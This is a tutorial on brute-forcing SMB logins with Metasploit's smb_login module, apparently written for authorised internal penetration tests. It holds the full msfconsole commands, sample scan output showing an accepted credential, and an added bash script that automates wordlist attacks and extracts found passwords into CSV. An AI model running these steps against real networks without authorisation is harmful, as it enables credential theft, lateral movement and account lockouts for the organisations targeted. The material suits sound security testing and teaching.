SMB Login Bruteforce

Introduction

Validating credentials against SMB is a routine step in an internal penetration test: one reused local administrator password, or one weak domain account, is often all that is needed to move laterally across a Windows network. Metasploit's auxiliary/scanner/smb/smb_login module tries one or more username/password pairs against the SMB service (TCP 445) of every host in RHOSTS and reports which pairs are accepted. Two caveats apply before running it against a real environment: every rejected attempt is a failed logon on the target (Windows records it as a 4625 event and counts it toward the account lockout threshold, which is why the module has ABORT_ON_LOCKOUT), and the module only stores what it finds if msfconsole is connected to a database.

Step-by-Step Guide

1. Open msfconsole

2. Load the SMB login module

msf6 > use auxiliary/scanner/smb/smb_login

3. Configure the needed options. At minimum set RHOSTS and something to try: here a single SMBUser/SMBPass pair, which makes this a credential check across the subnet rather than a brute force. For wordlists use USER_FILE and PASS_FILE (or USERPASS_FILE for pre-paired entries). Leave SMBDomain at `.` to test local accounts, or set it to the domain name for domain accounts.

msf6 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING   none             no        Skip existing credentials stored in the current database (Accept
                                                 ed: none, user, user&realm)
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target host(s), see https://docs.metasploit.com/docs/using-m
                                                 etasploit/basics/using-metasploit.html
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair
                                                  per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts

msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.0.0/24
RHOSTS => 192.168.0.0/24
msf6 auxiliary(scanner/smb/smb_login) > set SMBUser user
SMBUser => user
msf6 auxiliary(scanner/smb/smb_login) > set SMBPass password
SMBPass => password

4. Run the module and check the output

msf6 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.0.0:445       - 192.168.0.0:445 - Starting SMB login bruteforce
[*] 192.168.0.1:445       - 192.168.0.1:445 - Starting SMB login bruteforce
[*] 192.168.0.2:445       - 192.168.0.2:445 - Starting SMB login bruteforce
[*] 192.168.0.3:445       - 192.168.0.3:445 - Starting SMB login bruteforce
[*] 192.168.0.4:445       - 192.168.0.4:445 - Starting SMB login bruteforce
[*] 192.168.0.5:445       - 192.168.0.5:445 - Starting SMB login bruteforce
[*] 192.168.0.6:445       - 192.168.0.6:445 - Starting SMB login bruteforce
[*] 192.168.0.7:445       - 192.168.0.7:445 - Starting SMB login bruteforce
[*] 192.168.0.8:445       - 192.168.0.8:445 - Starting SMB login bruteforce
[*] 192.168.0.9:445       - 192.168.0.9:445 - Starting SMB login bruteforce
...
[!] 192.168.0.144:445     - No active DB -- Credential data will not be saved!
[-] 192.168.0.168:445     - 192.168.0.168:445 - Could not connect
[!] 192.168.0.168:445     - No active DB -- Credential data will not be saved!
[+] 192.168.0.166:445     - 192.168.0.166:445 - Success: '.\user:password'
[!] 192.168.0.166:445     - No active DB -- Credential data will not be saved!
[*] 192.168.0.178:445     - 192.168.0.178:445 - Starting SMB login bruteforce
[*] 192.168.0.179:445     - 192.168.0.179:445 - Starting SMB login bruteforce
[*] 192.168.0.180:445     - 192.168.0.180:445 - Starting SMB login bruteforce
[*] 192.168.0.181:445     - 192.168.0.181:445 - Starting SMB login bruteforce
...
[-] 192.168.0.245:445     - 192.168.0.245:445 - Could not connect
[!] 192.168.0.245:445     - No active DB -- Credential data will not be saved!
[-] 192.168.0.255:445     - 192.168.0.255:445 - Could not connect
[!] 192.168.0.255:445     - No active DB -- Credential data will not be saved!
[*] 192.168.0.0/24:445    - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

The pair was accepted on 192.168.0.166:445 as the local account user:password; the leading `.\` in `'.\user:password'` is the SMBDomain value and marks a local rather than domain logon. Every other host either refused the connection on 445 or rejected the pair. The `[!] No active DB` warnings mean msfconsole was started without a database connection, so the credential was printed but not stored; initialise the database first (`msfdb init`, then confirm with `db_status` inside msfconsole) so that results are saved and can be listed later with `creds`.
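The walkthrough above types every option by hand and reads the result off the console. The following script is an added example, not code from the original page or from Metasploit: it generates an msfconsole resource file that runs smb_login with wordlists and lockout-conscious settings, and parses the module's console output (the `[+] ... Success: '...'` lines shown above) into CSV. The file names users.txt, passwords.txt and smb_login.rc, and the second sample line for a CORP domain account, are assumptions made for the example.

```shell
#!/usr/bin/env bash
# Added example, not code from the original page or from Metasploit:
# (1) generate an msfconsole resource file that runs smb_login with
#     wordlists and lockout-conscious settings, and
# (2) pull the accepted credentials out of the module's console output
#     into CSV rows of host,domain,user,password.
# The file names users.txt / passwords.txt / smb_login.rc are assumptions.

# Write a resource script for `msfconsole -q -r <outfile>`.
# Compared with the single SMBUser/SMBPass pair in the walkthrough, this
# iterates USER_FILE x PASS_FILE, also tries each username as its own
# password, stops per host on the first hit, and aborts if the target
# starts reporting locked-out accounts. `spool` copies console output to
# a log file that parse_smb_successes can read afterwards.
write_smb_login_rc() {
  local rhosts="$1" user_file="$2" pass_file="$3" outfile="$4"
  cat > "$outfile" <<EOF
spool ${outfile%.rc}.log
use auxiliary/scanner/smb/smb_login
set RHOSTS ${rhosts}
set USER_FILE ${user_file}
set PASS_FILE ${pass_file}
set USER_AS_PASS true
set BLANK_PASSWORDS false
set ABORT_ON_LOCKOUT true
set STOP_ON_SUCCESS true
set BRUTEFORCE_SPEED 3
set THREADS 16
set VERBOSE false
run
spool off
exit
EOF
}

# Read smb_login console output on stdin; print one CSV row per accepted
# login. Only "[+] ... Success: 'DOMAIN\user:pass'" lines are used, with
# "." as the domain for local accounts. Passwords may contain ':'; the
# optional trailing " Administrator" marker is discarded.
parse_smb_successes() {
  local line host cred domain rest user pass
  while IFS= read -r line; do
    case "$line" in
      "[+] "*" - Success: '"*) ;;
      *) continue ;;
    esac
    host=${line#"[+] "}           # "192.168.0.166:445     - ..."
    host=${host%%:*}              # "192.168.0.166"
    cred=${line#*" - Success: '"} # ".\user:password'" plus optional suffix
    cred=${cred%\'*}              # drop the last quote and anything after it
    domain=${cred%%\\*}           # text before the first backslash
    rest=${cred#*\\}              # "user:password"
    user=${rest%%:*}              # up to the first ':'
    pass=${rest#*:}               # everything after it, colons included
    printf '%s,%s,%s,%s\n' "$host" "$domain" "$user" "$pass"
  done
}

# Constructed sample of module output in the format shown in the
# walkthrough (not a real capture); the CORP line is invented to
# exercise domain parsing and the trailing Administrator marker.
sample_output() {
  cat <<'EOF'
[*] 192.168.0.165:445     - 192.168.0.165:445 - Starting SMB login bruteforce
[-] 192.168.0.165:445     - 192.168.0.165:445 - Could not connect
[!] 192.168.0.165:445     - No active DB -- Credential data will not be saved!
[+] 192.168.0.166:445     - 192.168.0.166:445 - Success: '.\user:password'
[!] 192.168.0.166:445     - No active DB -- Credential data will not be saved!
[+] 10.0.0.5:445          - 10.0.0.5:445 - Success: 'CORP\svc_backup:Tr0ub4dor:3' Administrator
[*] 192.168.0.0/24:445    - Scanned 256 of 256 hosts (100% complete)
EOF
}

# Stand-alone run: print the parsed sample, and also emit a resource file
# when called as:
#   ./smb_login_helper.sh 192.168.0.0/24 users.txt passwords.txt smb_login.rc
sample_output | parse_smb_successes
if [ "$#" -eq 4 ]; then
  write_smb_login_rc "$1" "$2" "$3" "$4"
fi
```

Run the generated file with `msfconsole -q -r smb_login.rc` after `msfdb init`, then feed the spooled log through `parse_smb_successes` (or simply run `creds` in msfconsole, since with a database connected the module stores every hit itself). The parser keys on the `Success:` line format shown above; if a future module version changes that wording, the `case` pattern is the one place to adjust.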
